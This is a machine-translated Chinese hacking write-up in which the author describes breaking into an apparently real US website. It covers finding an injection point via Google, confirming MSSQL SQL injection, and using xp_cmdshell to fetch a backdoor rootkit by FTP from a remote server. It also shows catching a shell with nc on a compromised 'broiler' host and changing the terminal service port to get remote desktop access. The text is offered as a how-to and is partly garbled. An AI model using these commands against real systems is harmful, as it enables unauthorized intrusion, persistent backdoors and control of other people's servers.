Permeate the USA website by injection
Author: rover [play8.net]
These days have seen a lot of injection articles, watching the blood is boiling ~ Ready to find a station to see ~ China is not dry ~ nor a patriotism ~ It can't afford it ~~~~
The most basic requirement for injection is to find an injection point ~ Where to find so many injection points ~ I thought Google
A very classic injection point suffix .asp? Id = 8, selected "Search all web pages",. Ha, a large English leaf
Hand test on a point ~
http://xxx.com/list.asp?id=8 '
If you filter the single quotes, return to the normal page ~
After a lot of websites, I finally found a legendary injection point.
http://www.sssd.com/program_detail.asp?id=8 '
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040e14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] unclosed Quotation Mark Before The Character String ''.
Ok ~ Description is very likely to inject ~ and MSSQL, I like it.
Tested
http://www.sssd.com/program_detail.asp?id=8 and 0 <> (SELECT @@ Version) -
This is the version and SQL version of the other party system.
return
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition On Windows NT 5.0 (Build 2195: Service Pack 4) 'To a column of data type int.
/Program_Detail.asp, Line 15
Well, it is NT5.0 SP4, it is also mixed ~ The United States is so cockorious.
Look at the SQL account used on the web page is DBO permissions, if we are likely to use XP_cmdshell to execute system commands
http://www.ssd.com/program_detail.asp?id=8 and user_name () = 'dbo'
Returns the normal page ~ Hoho ~~ Description each other is the SQLServer account of DBO privileges
Next, you get system authority ~
Pressing the way to use the rotten method now should now get the physical path of the web and then pass the WebShell ~
But 俺 俺 俺 俺 看 方法 还 还 还 路 路 路 路 路 路
Find 13K to have a paragraph is said to be a universal path code
Http://www.sssd.com/program_detail.asp?id=8;create Table [DBO]. [13K] ([fuck] [char] (255));
http://www.sssd.com/program_detail.asp?id=8;DECLARE @result varchar (255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots', '/', @Result Output Insert INTO 13K (@Result); --http: //www.ssd.com/program_detail.asp? id = 8 and (SELECT TOP 1 Fuck from 13K) = 1
This code is written in a table from the registry to read the other party web. Finally, by querying the path of the web, it is not successful, and the second sentence is wrong.
Since you can't change the method ~ Look at the other party has any delete XP_cmdshell extension
Listening to a port 99 on the broiler
NC -L -VV -P 99
http://www.sssd.com/program_detail.asp?id=8 ;ec master.dbo.xp_cmdshell 'telnet broiler ip 99; -
I will react with NC on my broiler, haha ~, xp_cmdshell is also
http://www.ssd.com/program_detail.asp?id=8 ;ec master.dbo.xp_cmdshell 'Net Start Tlntsvr';
Open Telnet service ~
Return normal page ~ Description, our commands are likely to succeed.
My telnet www.sssd.com mother, the system tells the 23 port of the remote host
Depressed ~ It seems that the other party is filtered with the port
Since you can execute the system command, then the set of the shell is used ~ haha ~
First configure a back door, I use hxdef100 (can pass through the firewall, I like), configure it, then do an automatic installation of install.cmd, use WinRAR to make self-decontinate, configure self-explanation Implement install.cmd installation back door
http://www.sssd.com/program_detail.asp?id=8 ;ec master.dbo.xp_cmdshell 'echo open ftpserver port> t.t'; -
http://www.ssd.com/program_detail.asp?id=8; Ecex Master.dbo.xp_cmdshell'echo User >> C: /T.T '
http://www.ssd.com/program_detail.asp?id=8 ;ec master.dbo.xp_cmdshell'echo pass >> c: /t.t '
http://www.sssd.com/program_detail.asp?id=8 ;ec master.dbo.xp_cmdshell'echo get rover.exe >> c: /t.
Http://www.ssd.com/program_detail.asp?id=8 ;exec master.dbo.xp_cmdshell'Echo Bye >> C: /T.t '
Write a batch file for an FTP to go in ~ Haha ~ then we will execute
Http://www.ssd.com/program_detail.asp?id=8 ;ec master.dbo.xp_cmdshell'ftp -s: t.t '
That rover.exe is a configured back door, returning to the normal page, very likely to download complete
Execute the back door ~
Http://www.ssd.com/program_detail.asp?id=8; Ekini ~ Now use the client 80, enter the password, hoho ~~~ Shell appeared ~~
ADMIN permission, Net Start, found that the remote host opened the terminal service, transmit TerninalPort.exe (a small thing to see the modified terminal service port) found that the port is 3389
Telnet www.sssd.com 3389 Tips Unconnected, NND, filtering ~ god ~~
At the time, I guess the problem of the opponent's host on the opponent ~ Pass pskill and fport.exe, kill the suspicious process ~ Telnet 3389, still not ~ Try ~ I saw him with WinVNC control software on the host, and guess It is administrator to manage, Telnet WWW, Naïf.com 5800 mother, pass ~~ Administrator's true metamorphosis ~ put a good terminal management is not available, non-VNC, Faint ~~
PSkill WinVNC ~
Kill the WinVNC process, then delete the WinVNC service file ~ Mom, see you still started ~
At last
TerninalPort 5800
Change the port of the terminal to 5800, restart the system ~~
After 2 minutes, I use the terminal to connect to www.sssd.com:5800 success ~ hoho ~~~
After connecting, I found that this host doesn't have any firewall, and there is no ISPEC policy ~ port filtering is fully implemented on the route, NND
There is no technical thing in this article ~ just a thinking ~ I hope to use it for you.
